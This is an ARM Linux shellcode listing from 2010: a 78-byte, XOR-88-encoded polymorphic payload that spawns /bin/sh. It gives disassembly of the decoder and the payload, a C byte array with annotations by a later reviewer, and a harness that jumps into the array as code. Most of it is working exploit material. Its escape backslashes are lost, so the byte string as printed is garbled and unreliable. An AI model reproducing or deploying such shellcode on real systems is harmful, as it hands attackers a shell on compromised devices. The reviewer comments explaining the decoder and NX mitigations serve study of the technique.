# Title : Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded -
# Published : 2010-07-03
# Author :
/*
Title: Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded - 78 bytes
Date: 2010-06-28
Tested on: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
! Database of shellcodes http://www.shell-storm.org/shellcode/
== Disassembly of XOR decoder ==
00008054 <debut-0x8>:
8054: e28f6024 add r6, pc, #36 ; 0x24
8058: e12fff16 bx r6
0000805c <debut>:
805c: e3a040e3 mov r4, #227 ; 0xe3
00008060 <boucle>:
8060: e3540c01 cmp r4, #256 ; 0x100
8064: 812fff1e bxhi lr
8068: e24440e3 sub r4, r4, #227 ; 0xe3
806c: e7de5004 ldrb r5, [lr, r4]
8070: e2255058 eor r5, r5, #88 ; 0x58
8074: e7ce5004 strb r5, [lr, r4]
8078: e28440e4 add r4, r4, #228 ; 0xe4
807c: eafffff7 b 8060 <boucle>
8080: ebfffff5 bl 805c <debut>
== Disassembly of execve("/bin/sh", ["/bin/sh"], NULL) ==
00008054 <_start>:
8054: e28f6001 add r6, pc, #1 ; 0x1
8058: e12fff16 bx r6
805c: 4678 mov r0, pc
805e: 300a adds r0, #10
8060: 9001 str r0, [sp, #4]
8062: a901 add r1, sp, #4
8064: 1a92 subs r2, r2, r2
8066: 270b movs r7, #11
8068: df01 svc 1
806a: 2f2f cmp r7, #47
806c: 6962 ldr r2, [r4, #20]
806e: 2f6e cmp r7, #110
8070: 6873 ldr r3, [r6, #4]
*/
#include <stdio.h>
#include <string.h>
/*
 * SC: the 78-byte sample from the header comment, as a C string literal.
 *
 * NOTE(review): the escape backslashes were lost when this page was
 * extracted. As printed, "x24x60..." is a run of plain characters, not
 * the bytes 0x24 0x60 ..., so strlen(SC) in main() reports the length of
 * that text and the call into SC cannot execute the sample. The hex
 * digits themselves agree with the two disassemblies above.
 *
 * Layout, read against the decoder disassembly (little-endian words):
 *   - first 12 groups (48 bytes): the XOR decoder. The add/bx pair
 *     jumps forward to the trailing "bl debut", which leaves lr pointing
 *     just past the decoder, i.e. at the encoded payload. The loop keeps
 *     r4 in 227..256 for the cmp and subtracts 227 to get indices 0..29,
 *     loads one byte at [lr, r4], eor's it with 88 (0x58) and stores it
 *     back; "add r4, #228" then nets +1 per iteration.
 *   - last 30 bytes: the execve("/bin/sh", ...) payload, XOR 88.
 *     Decoding the first group by hand gives e28f3001 / e12fff13, i.e.
 *     "add r3, pc, #1 / bx r3" — the listed add/bx pair with r3 instead
 *     of r6, which looks like the "polymorphic" change; the remaining
 *     groups decode to the Thumb listing and the tail "//bin/sh".
 *   No 0x00 byte appears, which is the only reason main() can size the
 *   sample with strlen().
 */
char SC[] = "x24x60x8fxe2"   /* e28f6024  add r6, pc, #36  -> bl debut  */
"x16xffx2fxe1"               /* e12fff16  bx r6                          */
"xe3x40xa0xe3"               /* e3a040e3  mov r4, #227                   */
"x01x0cx54xe3"               /* e3540c01  cmp r4, #256   (loop test)     */
"x1exffx2fx81"               /* 812fff1e  bxhi lr        (done: run it)  */
"xe3x40x44xe2"               /* e24440e3  sub r4, r4, #227 -> index      */
"x04x50xdexe7"               /* e7de5004  ldrb r5, [lr, r4]              */
"x58x50x25xe2"               /* e2255058  eor r5, r5, #88                */
"x04x50xcexe7"               /* e7ce5004  strb r5, [lr, r4]              */
"xe4x40x84xe2"               /* e28440e4  add r4, r4, #228               */
"xf7xffxffxea"               /* eafffff7  b boucle                       */
"xf5xffxffxeb"               /* ebfffff5  bl debut  (lr = payload start) */
"x59x68xd7xba"               /* XOR 88 -> add r3, pc, #1 (see note)      */
"x4bxa7x77xb9"               /* XOR 88 -> bx r3                          */
"x20x1ex52x68"               /* XOR 88 -> mov r0, pc ; adds r0, #10      */
"x59xc8x59xf1"               /* XOR 88 -> str r0, [sp, #4] ; add r1, sp  */
"xcax42x53x7f"               /* XOR 88 -> subs r2, r2, r2 ; movs r7, #11 */
"x59x87x77x77"               /* XOR 88 -> svc 1 ; "//"                   */
"x3ax31x36x77"               /* XOR 88 -> "bin/"                         */
"x2bx30";                    /* XOR 88 -> "sh"                           */
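/*
 * Test harness: print the sample's length, then jump into it.
 *
 * Fixes against the listing as printed: strlen() returns size_t, so the
 * conversion is %zu (the original %d is a format/argument mismatch, which
 * is undefined behaviour); the newline escape lost in extraction is
 * restored; strlen() needs <string.h>, included at the top of the file.
 *
 * strlen() is only a valid length because the sample contains no 0x00
 * byte. The call below treats a writable data array as code. Converting
 * a char array to a function pointer is not defined by ISO C, and on any
 * system that maps .data non-executable (NX / W^X) the call faults rather
 * than running the sample — that mitigation is precisely what defeats
 * run-from-data loaders of this kind; the harness assumes the 2010 ARM
 * target it was written for.
 *
 * Returns 0 (never reached if the sample runs and replaces the process).
 */
int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(SC));
    (*(void (*)(void)) SC)();
    return 0;
}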